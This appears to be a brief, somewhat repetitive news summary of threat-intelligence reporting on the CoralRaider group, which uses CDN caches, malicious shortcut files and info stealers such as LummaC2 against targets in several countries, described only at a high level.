April 23, 2024 at 05:34PM
A financially motivated threat actor, known as CoralRaider, is conducting an ongoing malware campaign targeting systems in the U.S., U.K., Germany, and Japan. The group uses a content delivery network cache to distribute malware, including info stealers LummaC2, Rhadamanthys, and Cryptbot. The attacks start with malicious Windows shortcut files delivered through various channels. CoralRaider has expanded its targets beyond Asian countries and is now operating in countries such as the U.S., Nigeria, Pakistan, and others.
From the meeting notes, I’ve gathered that a threat actor known as CoralRaider is conducting an ongoing campaign aimed at stealing sensitive information from systems in the U.S., the U.K., Germany, and Japan. They are using a content delivery network (CDN) cache to store and distribute information-stealing malware.
CoralRaider is believed to be a financially motivated threat actor, targeting credentials, financial data, and social media accounts. They use malware-as-a-service platforms to distribute info stealers such as LummaC2, Rhadamanthys, and Cryptbot for a subscription fee.
To deliver the malware, CoralRaider initiates attacks with an archive containing a malicious Windows shortcut file (.LNK), which is then executed using PowerShell commands. The process involves obfuscation and deception to avoid detection, including the use of a CDN cache as a malware delivery server and manipulation of Windows Defender exclusions. The attack then proceeds to bypass User Access Control (UAC) security features and install one of the three info stealers.
Furthermore, it’s noted that CoralRaider’s recent attacks have involved fairly recent versions of the info stealers, each with new and advanced features for stealing sensitive data from various applications and sources.
The threat actor has been active since at least 2023 and is believed to be based in Vietnam. Previous campaigns have targeted Asian and Southeast Asian countries, but the latest operation has expanded to include additional countries such as the U.S., Nigeria, Pakistan, and others.
This information provides a comprehensive overview of the threat posed by CoralRaider and the methods they employ for their malicious activities.